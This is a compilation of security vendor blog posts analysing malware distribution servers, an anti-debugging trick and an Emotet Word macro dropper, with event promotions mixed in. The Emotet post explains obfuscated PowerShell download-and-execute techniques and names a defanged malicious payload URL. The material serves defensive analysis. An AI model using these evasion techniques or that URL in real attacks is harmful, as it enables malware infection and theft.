• More than a dozen US-based web servers were used to host 10 malware families, distributed through mass phishing campaigns.
• Malware families include Dridex, GandCrab, Neutrino, IcedID and others.
• Evidence suggests the existence of distinct threat actors: one responsible for email and malware hosting, and others that operate the malware.
• Indications that the servers are part of Necurs botnet malware-hosting infrastructure.

A Bromium review of threat data from May 2018 to March 2019 has documented a collection of web servers located in the United States that are being used to distribute 10 major malware families in large-scale malicious spam campaigns.

The malware hosted on the infrastructure includes five families of banking Trojans, two families of ransomware, and three information stealers. Multiple malware families were staged on the same web servers and subsequently distributed through mass phishing campaigns. The reuse of the servers to host different malware indicates the involvement of a common entity in the activities of the different malware operators. The variety of malware families hosted, and the apparent separation of command and control (C2) from email and hosting infrastructure, suggests the existence of distinct threat actors: one responsible for email and hosting, and others in charge of operating the malware.

In each of the campaigns, email was the attack vector. The phishing emails delivered Microsoft Word documents and used social engineering to trick victims into running malicious VBA macros that would download the malware. Significantly, the web servers we identified belong to a single autonomous system, AS53667, registered under the netname PONYNET, which contains 52,992 IP addresses. The hosting provider that owns PONYNET is a company called FranTech Solutions, a so-called “bulletproof host”. BuyVM is another company owned by FranTech that sells virtual private server (VPS) hosting services. One of the data centres used by BuyVM is in Nevada, US, which is where 11 of the web servers were hosted.

Malware Hosted on US Soil

It was interesting to us that the hosting infrastructure is located in the United States and not in a jurisdiction that is known to be uncooperative with law enforcement. One possible reason for choosing a US hosting provider is so that the HTTP connections to download the malware from the web servers are more likely to succeed inside organisations that block traffic to and from countries that fall outside of their typical profile of network traffic.

There is evidence to suggest that the malware identified primarily targets an anglophone audience because all the phishing emails and documents we examined from campaigns linked to the hosting infrastructure were written in English. Moreover, several of the lures used were only relevant to a US audience. For example, in March 2019 GandCrab ransomware hosted one of the web servers was distributed through phishing emails that purported to be from the Centers for Disease Control and Prevention (CDC), a US government federal agency.

Campaign Similarities

The servers identified run similar software builds, namely default installations of CentOS and Apache HTTP Server versions 2.4.6 or 2.2.15. The malicious executables were nearly always hosted in the root directory of the web servers. We found no evidence that the web servers ever hosted legitimate content, which suggests that they were provisioned to host malware.

Figure 1 – The default Apache installation web page had not been changed on the servers.

The naming convention of the malicious files often revealed the family of the malware or its intended purpose. For example, in a campaign in September 2018 we saw a Neutrino (also known as Kasidet) sample named ‘cc.exe’ being hosted. Neutrino is an information stealer known for exfiltrating credit card data from point of sale (POS) systems, perhaps explaining why it was given this filename.

When we examined the samples hosted on the web servers, we noticed that the time difference between when they were compiled and when they were first observed being hosted was less than 24 hours, and in some cases only a matter of hours. The quick turnaround from compilation to hosting suggests an organised relationship between malware developers and the operators of the distribution infrastructure.

We identified similarities across the malicious spam campaigns delivering the different malware families hosted on the web servers. Nearly all of the campaigns delivered phishing emails with Microsoft Word documents that contained malicious VBA macros. In several campaigns, the phishing emails contained a hyperlink to a domain pointed to one of the malware distribution servers. Analysis of the macros in the Word droppers found that they all contained a hard-coded IP address of the web server hosting the second-stage malware, rather than a domain name. Additionally, all the macros saved the resulting executable to a file named ‘qwerty2.exe’, which was then run in the user’s temporary directory. 63% of the campaigns delivered a weaponised Word document that was password protected, with a simple password in the message body of the email, such as ‘1234’ or ‘321’.

Figure 2 – Most frequently encountered weaponised document type.

We also noticed the reoccurrence of lures across the campaigns. The most popular lure was a job application narrative (42%) containing a resume to be reviewed, followed by emails posing as unpaid invoices (21%).

Shared Malware Hosting Infrastructure

We identified several cases where multiple malware families were hosted on the same server. In some cases, two malware families were used in conjunction with each other, where one would act as a dropper for the other. We saw this pairing behaviour in phishing campaigns in July and August 2018 that delivered AZORult, an information stealer that was used to download Hermes ransomware. In those campaigns, both types of malware were hosted on the same server.

Figure 3 – Dridex and IcedID shared distribution infrastructure.

The other pattern we saw is where the servers were reused to host malware for different campaigns. On 5 March 2019, we saw a malicious spam campaign that ultimately delivered IcedID, a banking Trojan. The following week on 13 March, we observed the same server being reused to host Dridex, a different family of banking Trojan. In another case, we saw a single web server being used to host six different malware families in campaigns over 40 days in 2018.

Links to Necurs Botnet and Signs of a Possible Dridex Resurgence

In March 2019, we noticed that one of the web servers was used to host a recent sample of Dridex. Seeing Dridex on this infrastructure was interesting to us for two reasons. The gang operating Dridex has been using the Necurs botnet as a vehicle for spreading their malware through malicious spam campaigns since 2016. Given the similarities between the campaigns delivering Dridex and the other malware families we identified, it is possible that this collection of web servers is part of the malware hosting and distribution infrastructure used by the operators of the Necurs botnet. All the hosted malware we examined has been linked to high-volume malicious spam campaigns that are consistent with the tactics, techniques and procedures (TTPs) and distribution-as-a-service business model of the Necurs botnet.

The second reason why this caught our attention is that, unlike the other campaigns, the web server enforced HTTP basic authentication as a means of preventing the executable from being downloaded without a correct username and password. It is likely that this was implemented to impede investigations by network defenders and researchers because analysis of the payload requires access to the Word dropper or sources of network traffic containing the HTTP request, such as proxy logs or full packet capture. The username and password pair in that campaign was ‘username’ and ‘password’, and the name of the delivered file was ‘test1.exe’, suggesting that this may have been a trial campaign. Given the relative lull of Dridex activity for several months, this may be an indication of preparation for larger Dridex campaigns to come, or the adoption of HTTP basic authentication in other campaigns.

Figure 4 – VBA code from Word dropper delivering Dridex using HTTP basic authentication in March 2019.

Malware Families Hosted

We identified 10 malware families being distributed through this hosting infrastructure, listed below.

Mitigation

Email is the favoured attack vector for the malware families we identified in this research. This speaks to the enduring effectiveness of phishing campaigns at convincing users to open malicious documents and hyperlinks. Computers that are running Bromium Secure Platform are protected from these attacks because every Office document and website is opened in an isolated micro-virtual machine. Should a vulnerability be exploited, or malware downloaded by a macro, it has zero impact on the confidentiality, integrity and availability of the data held on the machine. All of the threat data associated with the attack is recorded and presented in the Bromium Controller, enabling SOC and incident response teams to gain detailed insights into the threats facing their organisations quickly.

Indicators of Compromise (IOCs)

The post Mapping Out a Malware Distribution Network appeared first on Bromium.

• Going to SecureWorld Philadelphia? Visit Bromium at Booth 600!
• Come click on ransomware at our booth
• See a demo of Bromium Secure Platform learn more about application isolation and containment

SecureWorld conferences provide an excellent forum for building networks among security practitioners. Their goal is to help companies improve not only their individual security posture, but also to make the overall security environment better and easier to manage. People come to SecureWorld events to meet their peers and have productive conversations about the issues they are facing and learn from each other’s best practices.

Bromium is heading to Philadelphia this week to participate in the expo. The exhibit hall hours are: Wednesday, April 10 and Thursday, April 11, from 9am through 3pm. Look for us at Booth 600.

If you are planning to attend SecureWorld in Philly, please stop by to click on ransomware. Our application isolation experts will be running demos of Bromium Secure Platform and talking about our innovative approach to enterprise security.

Learn how adding Bromium to your enterprise defenses can help strengthen your protection against threats. SecureWorld is all about networking and spreading knowledge – come see how Bromium has helped hundreds of companies secure their endpoints by trapping malware and sharing threat intelligence with security teams. We hope to see you in Philly!

The post SecureWorld Philadelphia: Visit Bromium at Booth 600 appeared first on Bromium.

We recently encountered a piece of malware via a tweet, which caught our eye because it appeared to be searching for folders related to our product. During analysis we discovered that this malware employs a novel technique to prevent reverse engineering via a debugger, and we felt that it was worth writing about, in case other malware is using similar tricks to make a researcher’s job more difficult.

Basic analysis using Procmon shows that the malware relaunches itself as a child process, which is where most of the action takes place. However, all attempts to attach to the child process with a debugger to get a closer fail with the following error:

The explanation resides in the flags passed to CreateProcess by the parent. When the malware relaunches itself as a child process it does so with the DEBUG_ONLY_THIS_PROCESS flag specified. This causes the parent to act as a debugger to the child, which prevents analysts from attaching their own debugger to get a closer look at what it’s doing.

Then, the parent walks through the child’s execution using the WaitForDebugEvent and ContinueDebugEvent API calls for creating a co-dependent relationship between the parent and the child with no room for an additional debugger:

Since it is not possible to attach a debugger to the child directly, the next best option is to perform a memory dump of the child and analyse this instead. However, the malware is prepared for this kind of approach and takes steps to make it more difficult.

After launching the child with the parent set to debug it, the child calls VirtualProtectEx with the NO_ACCESS flag set on its own memory space. This means that any attempt to read, write or execute in this space will result in an access violation exception.

However, because the exception gets passed to the parent, which is debugging it, the parent handles the exception by calling VirtualProtectEx again on the section with the flags set to EXECUTE_READWRITE to temporarily allow execution. After this, it sets the memory back to NO_ACCESS again to prevent dumping:

Luckily, we can get around this by using IDA to patch the arguments passed to VirtualProtectEx changing the the NO_ACCESS flag to a EXECUTE_READWRITE flag allowing for a complete memory dump of the child:

Equipped with the new memory dump, it becomes much easier to get a handle on what the malware is doing:

As you can see, the malware is looking to steal crypto wallets from infected endpoints. Additionally, by tracing API calls, we find that it is searching for to saved logins and cookies from a number of browsers including Bromium Secure Browser:

This kind of attack is ineffective against Bromium-secured endpoints because Bromium runs all documents and browser sessions inside a secure container, meaning that the sensitive information searched for by this malware is inaccessible and the malware has no ability to persist once the session is closed.

The post Malware Debugs Itself to Prevent Analysis appeared first on Bromium.

The post A dozen US web servers are spreading 10 malware families, Necurs link suspected appeared first on Bromium.

The post Bulletproof ‘Amazon’ for malware uncovered by researchers appeared first on Bromium.

The post Researchers uncover US-based malware distribution centre appeared first on Bromium.

The post Threat Group Employs Amazon-Style Fulfillment Model to Distribute Malware appeared first on Bromium.

The post Threat actors use US data center to spread malware appeared first on Bromium.

The post Bromium uncovers US-based malware distribution center appeared first on Bromium.

The post FBI doesn’t have ‘bandwidth’ to handle cyberattack scope appeared first on Bromium.

The post US Web Servers Hosted 10 Malware Families appeared first on Bromium.

• Some of the most popular social media platforms are being exploited by cybercriminals to openly sell their tools and expertise
• This exploitation means that the lines between clear web platforms and their dark web equivalents have become blurred

We use social media for many reasons. Keeping up with our friends, finding out the latest news or posting photos and videos. But in the latest chapter of Into the Web of Profit, I discovered a whole new aspect of social media that’s hidden in plain sight. Cybercriminals, just like businesses, are using social media platforms to promote and sell their tools and services. Simply going on Instagram, Twitter or Facebook and conducting a few searches led me deep into the rabbit hole of the cybercrime world. I was shocked to see the extent to which social media is being exploited by cybercriminals, not just as a tool to spread malware, but as a shopping destination for their expertise and their products.

A shop front for the dark web

The major concern from these findings is how social media platforms have enabled the ready availability of products and services that were once only available in the darker corners of the internet. Up to 40% of the social media platforms examined for this report had a form of hacking service available, offering cybercrime-as-a-service, tutorials and tools like malware or ransomware. Cybercriminals are using accounts to sell these openly, or to act as a marketing portal that attracts buyers to more extensive facilities on the dark web.

Cybercriminals have become incredibly brazen on social media. One Facebook account sticks out in my mind because it was offering the opportunity to trade or learn about exploits and was actively advertising on Twitter to attract buyers. They’ve even thought about their pricing strategies too! For example, botnet and booter hire had an average cost of around $10 per month for a full-service package with tutorials and tech support, or $25 for a no-frills lifetime rental. That’s cheaper than a Netflix subscription.

What the findings clearly show is a maturing marketplace, no longer content with limiting their activities to the dark web. Cybercriminals have taken to social media to extend their reach and bring their services to a wider audience. Social media has blurred the lines between legitimate clear web platforms and illegitimate dark web marketplaces.

Social media must take an active stance against cybercrime

We can’t just unfriend social media – it’s become a central part of our personal and professional lives. However, its exploitation raises some very pressing issues. For organisations, the ready availability of cybercrime tools and services has made it much easier for hackers to launch cyberattacks. Social media is helping to bring dark web products and services to the masses, meaning attacks can come from anyone, anywhere and at any time. This can’t continue. Social media companies must take a much more active stance against the activities of cybercriminals exploiting their platforms. If we’re aware that social media is not just an avenue to deliver threats but also a market to sell them, then we can work together to stop cybercriminals exploiting it to flog their wares and make it harder for them to attract people to their dark web shopping facilities.

To learn more about the role of social media platforms in cybercrime and the implications this has on organisations, please download ‘Social Media Platforms and the Cybercrime Economy’ here.

The post Social Media Platforms Bring the Dark Web Closer Than You Think appeared first on Bromium.

The post Bromium: Isolated Breach Protection Using Virtual Machines appeared first on Bromium.

• Bromium is coming to FS-ISAC – look for our experts at Booth 77 and at other Summit events – lunch, reception, after-hours events, and more
• Come click on ransomware in our booth
• See a demo of our application isolation and containment solution, including our unique threat intelligence

Bromium has a long history of helping financial services organizations protect their networks and sensitive data against attacks. Our innovative approach to security that foregoes detection in favor of application isolation has proven remarkably effective in containing threats while allowing employees to do their work unimpeded by restrictive IT policies.

Read: Financial Services Case Study

If you’ll be at FS-ISAC next week, come see Bromium at Booth 77 to learn about how application isolation and control can protect your organization from threats – even the ones never before seen and therefore undetectable by traditional anti-malware technologies. You can also click on ransomware and watch it execute inside a secure micro-VM, and enter our raffle for noise-cancelling headphones.

We will have several of our security experts at the booth, plus there will be multiple opportunities to network with our staff during all FS-ISAC events, such as breakfast, lunch, breaks, receptions, dinners, and after-hours events. Hope to see you in Orlando!

The post Bromium at FS-ISAC, April 28-May 1 appeared first on Bromium.

The post How a social media network could bring down your business appeared first on Bromium.

• Emotet is a highly modular banking Trojan that has a proper decision tree-based algorithm to perform designated tasks.
• Due to Emotet’s capability to deliver obfuscated payloads and extend its capabilities through self-upgradable modules, it has become a commonly-used payload launcher in targeted attacks on organisations. Emotet’s use in multi-stage and multi-vector attacks has given it its nasty reputation.
• Emotet’s operators have adopted a “malware-as-a-service” business model, where the Trojan is used to download and distribute other types of malware, such as ransomware.

This is in continuation of James Wright’s post on Emotet, where he explained the level of risk that Emotet poses to the enterprise. James details how Bromium can detect an attack delivering Emotet, which has been missed by other security tools.

Read Part 1 of this blog series: Emotet: How It Might Infect Your PC (Part 1 of 3)

Since its inception in 2014 as a banking Trojan, Emotet continues to evolve as a multi-component malware family. Over the years it has adopted a highly flexible code base, which now includes the following functionalities:

• Use of packers to evade malware classification
• Use of anti-analysis techniques
• Indirect execution of a payload to break process chain-based analysis
• Privilege escalation via launching payload as a service or by stealing administrator credentials
• Obfuscated code across stages of attack
• Use of multiple persistence mechanisms
• Encrypted imports and function names
• Multiple JMP instructions in code to confuse reverse engineering tools
• Self-upgradable modules
• Ability to move laterally within a compromised network
• Ability to make infected hosts send phishing email campaigns by stealing address books and credentials from web browsers and email clients

Analysis

We have conducted the analysis of Emotet in three parts. Part one, as previously mentioned, can be found here. Part two breaks down the behavioral analysis of a phishing campaign delivering Emotet. In this post, we’ll take a deep dive into its ability to drop a payload by running an obfuscated VBA macro from a Microsoft Word document. Part three, coming soon, is a binary analysis of an Emotet sample, where we will explore how the malware works.

For this analysis we obtained a sample from a recent attack that was isolated by Bromium Secure Platform.

File: Receipt (1).doc

Dropper

The Emotet campaign here was being spread as a hyperlink, which downloads a Microsoft Word document. When opened, the document prompts the user to click ‘Enable content’. By default, if a document contains a macro or ActiveX controls, Microsoft Word prompts the user with a security warning. Typically, malware authors trick users into clicking the ‘Enable content’ button using social engineering to run the next stage of the attack.

In this case, enabling content causes the document to execute a VBA AutoOpen macro. As expected in Emotet VBA scripts, the strings are heavily obfuscated and include many fragmented strings. This is a well-known technique to make it harder for static analysis engines to detect malicious content.

We will walk through the script to find interesting patterns and deobfuscate the code.

Obfuscated AutoOpen macro

Variable ‘dBCwQQZ’ is defined with the string ‘winmgmts:Win32_Process’

Variable ‘TCXD_U’ is defined with the string ‘GetObject(winmgmts:Win32_ProcessStartup)’

Variable ‘jDD_UwDB’ is defined with the string ‘GetObject(winmgmts:Win32_Process).Create’

Sets the parameter of ‘GetObject(winmgmts:Win32_ProcessStartup).ShowWindow’ to a value of 0

Constructs the string ‘powershell -e’

We can see that the VBA script references WMI classes winmgmts:Win32_ProcessStartup and winmgmts:Win32_Process. On execution, the autoopen() Sub uses these WMI classes to launch an instance of PowerShell that runs a Base64 encoded command in the background.

Indirect Execution

Base64 encoded PowerShell command viewed in Bromium Controller

Since the macro uses WMI to run PowerShell, the process is launched in the background using WmiPrvSe.exe (WMI Provider Host). By executing PowerShell this way, malware authors can evade process chain-based detection.

As explained in our article about evasion techniques used by Ursnif, this is a known technique to launch PowerShell from a macro using a legitimate Windows process. Bromium detects this type of indirect execution and attributes any related process creations to the original executable responsible for running the malicious VBA code, in this case WINWORD.exe.

Obfuscated PowerShell command

After decoding the Base64 encoded string, the output in the image below is produced. The command is obfuscated using the same string joining and case mismatch techniques to make it harder for an analyst and scanning engines to understand.

The decoded string contains a ‘+’ character, which is used to join strings, and a mixture of upper case and lower case characters

One can simply remove all ‘+’ characters to reveal the deobfuscated command.

Command output after removing all of the ‘+’ characters

The above PowerShell command deflates and decodes a Base64 encoded string and reads it as a stream until it reaches the end of the string. It then runs the resulting output in memory using the ‘iex’ alias for the Invoke-Expression cmdlet, another popular technique among malware authors to execute commands. In order achieve this, it used the variable $Verbosepreference which contains the string ‘SilentlyContinue’. The first and third characters (‘i’ and ‘e’) are selected from the string, which are then joined with ‘X’, to form the string ‘ieX’.

Formation of the string ‘ieX’, which is the alias for the Invoke-Expression cmdlet

Deobfuscated PowerShell Script

The deobfuscated PowerShell script first splits the string assigned to the variable $XXQCZAxA using the ‘@’ character as a delimiter and then enters a ForEach loop, which iterates the resulting array of URIs to download an executable to the victim’s filesystem using the Net.WebClient class. The script uses the environment variable $env:userProfile to fetch the user profile directory of the currently logged-in user. The downloaded file is saved to the victim’s user profile directory (e.g. C:\Users\[Username]) with the filename ’15.exe’. If the size of a downloaded file is greater than 40KB, the script exits the ForEach loop and runs ‘15.exe’ using the Invoke-Item cmdlet.

Deobfuscated PowerShell command

HTTP GET request

As you can see from the screenshot below, the PowerShell command sends a HTTP GET request to retrieve the first-stage Emotet executable from hxxp://dautudatnenhoalac[.]com/wp-admin/DYAsI. The response from the web server indicates that the file served is called ‘s17zjCTuWfNF.exe’ and that the payload is a PE format file as indicated by the ASCII representation of the magic bytes 0x4D5A (‘MZ’) at the start of the file.

HTTP GET request, which downloads the first-stage Emotet payload

Behavioral Analysis

After downloading the payload, PowerShell runs ’15.exe’ (PID: 2600). The process then launches another instance of ’15.exe’ (PID: 2412) from the same location.

Process launch of 15.exe by PowerShell

The second instance of ’15.exe’ (PID: 2412) copies itself to the C:\Windows\SysWOW64 directory with the name ‘ipropmini.exe’. It then creates a service where the BinaryPath points to C:\Windows\SysWOW64\ipropmini.exe and the DesiredAccess is 18. DesiredAccess ‘18’ grants SERVICE_CHANGE_CONFIG and SERVICE_START access permissions to the service.

Service creation to establish persistence

Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection and second, upon the start of the service, the binary is always executed even though it is not a valid service executable.

The executable ‘ipropmini.exe’ (launched by services.exe) spawns another instance of itself which then downloads the next stage payload from the Internet. Afterwards, the executable performs process hollowing on the first Emotet process (‘15.exe’), where modified code is written.

Process Hollowing on first Emotet process ’15.exe’ (PID: 2600)

When left to run, Emotet downloads more payloads from remote servers and spawns several processes and collects system information and sends it through an encrypted channel to a command and control (C2) server.

Process interaction graph as viewed in Bromium Controller

High severity events raised during the Emotet infection lifecycle

HTTP POST request

Emotet sends system-related information to C2 servers using HTTP POSTs and receives further commands and payloads from the servers as a response.

HTTP POST requests to C2 servers

Indicators of Compromise (IOCs)

The post Emotet: Catch Me If You Can (Part 2 of 3) appeared first on Bromium.

The post KnowBe4: Cybercriminals Setting LinkedIn Phishing Traps appeared first on Bromium.

• Find Bromium in Booth 1837 at TechNet Cyber in Baltimore May 14-16, 2019
• Learn how Application Isolation and Control protects your endpoints, and see a customized demo
• Click on ransomware in our booth and watch it execute

Protecting our critical applications and infrastructure against cyber threats requires more than a single entity – it demands ongoing collaboration among multiple organizations and agencies.

The TechNet Cyber Conference – formerly the Defensive Cyber Operations Symposium – is an interactive forum connecting military and government leaders with industry professionals. There will be interactive workshops, training sessions, keynotes and presentations, and an exhibit hall. Head there during exhibit hours (see below) and look for Bromium at booth 1837.

We have assembled a great group of product and security experts to answer your questions about Application Isolation and Containment, and show you how Bromium’s solutions help isolate and control threats, even when detection-based defenses fail.

Exhibit Hours

• Tuesday, May 14, 1:15 PM – 7:00 PM
• Wednesday, May 15, 8:00 AM – 4:00 PM
• Thursday, May 16, 8:00 AM – 1:30 PM

We hope to see you in Baltimore!

The post Bromium at TechNet Cyber, Booth 1837 appeared first on Bromium.

• This report is made possible by customers who opted to share their Bromium-isolated threat data with Bromium, which our experts compiled into a Threat Insights Report
• Bromium Threat Insights Report is designed to share intelligence about the most notable malware that our experts have analyzed, and highlight new techniques used by attackers
• Learn practical and actionable information about how to protect your organization against emerging threats

Download: Bromium Threats Insight Report

Truly detailed threat intelligence is difficult for security tools to gather because the primary purpose of most security tools is to prevent malware from executing, which is mutually exclusive from working out what threat the attack really poses to the organization. It is possible to take the sample and run it in a SOC environment in the future to perform analysis, but often the command and control services will have been taken down, so the real danger of the payload would not be properly understood.

Bromium’s isolation gives security analysts a useful advantage because it does not block malware execution. Instead, Bromium  isolates it safely within a virtual machine, enabling detailed data to be gathered at the point when the user was hit with the attack. The command and control servers are more likely to be running, and the payloads the initial Trojan delivers would still be available. Bromium records and analyses the full kill chain of an attack as the user would have experienced it, while at the same time preventing that attack from having any impact on the enterprise. The best of both worlds.

Beginning with Bromium 4.1.5 release, we have given all our customers an opportunity to opt-in to enable automatic threat forwarding through Bromium Cloud Services. You can read more about Bromium Threat Forwarding in this blog.

As Bromium customers began sharing their rich threat data with us, we have been able to paint a very detailed picture of recent malware campaigns and understand more about how they work. The Bromium analytics team meticulously analyses each piece of intelligence that comes in to learn about the nature of emerging threats and the danger they pose to the enterprise.

This information is then shared with the customer to give them full visibility We also publish detailed threat reports via technical deep-dive blog posts, such as our recent articles on emotet, ponynet, ursnif.

To spread this knowledge to an even broader audience, we have decided to start compiling a regular Threat Insights Report. This is a technical publication designed to share intelligence about the most notable malware that our experts have analyzed, highlight new techniques used by attackers, and provide practical and actionable information about how to protect your organization against emerging threats. This isn’t a marketing document, but suggestions on how to improve security based on the data we see.

Download: Bromium Threats Insight Report

The inaugural report covers the emergence of the new malware distribution infrastructure in the US, talks about the evolution of banking Trojans into more cunning and sophisticated threats, discusses the new methods attackers use for launching malicious payloads, and provides concrete and actionable recommendations for improving your endpoint security.

Are you sharing your threats with Bromium?

All Bromium customers can join our Threat Intelligence and Analysis program. Simply “Enable Threat Forwarding” under “Settings” on your Bromium Controller, and you automatically become a contributor to the dynamic and vibrant community of threat-sharers.

Once you enable the share settings, your Controller will automatically upload any threat alerts it receives, along with encrypted malware payload to Bromium Threat Intelligence Services.

Contributing to the Threat Intelligence program has huge benefits. And not just for you and your organization.  The data you share with Bromium gets processed, analyzed, and shared back with the community of Bromium users, so they can improve security of all their devices – not just the ones protected by Bromium. The more we know about our adversary, the more prepared we are for what may be coming next.

Learn more about the Threat Intelligence and Analysis program.

The post Introducing the Bromium Threat Insights Report appeared first on Bromium.

Attention New York! Come out to the NY Information Security Meetup next week to meet with Bromium and learn how application isolation can keep threats off your endpoints. Join us at 6pm on Tuesday, May 14, in Midtown: 215 Lexington Ave.

RSVP

Bromium’s Dan Femino will present how CPU features are driving advancements in endpoint security, and will give a demo of Bromium’s new product offering, Protected App. Expect an interactive session, with plenty of opportunities to ask questions and discuss your security concerns.

Tuesday’s meeting also features presentations on red teams and genetic malware analysis. It’s sure to be an insightful evening. Learn more and RSVP on the Meetup website.

Whether you are a regular at Information Security meetups, or just want to try one out, we encourage you to join us on Tuesday, May 14, 2019, 6-8pm at 215 Lexington Ave in New York City. Join the meetup, and let’s learn from each other.

The post Meet Us in New York! May 14 at the NY Information Security Meetup appeared first on Bromium.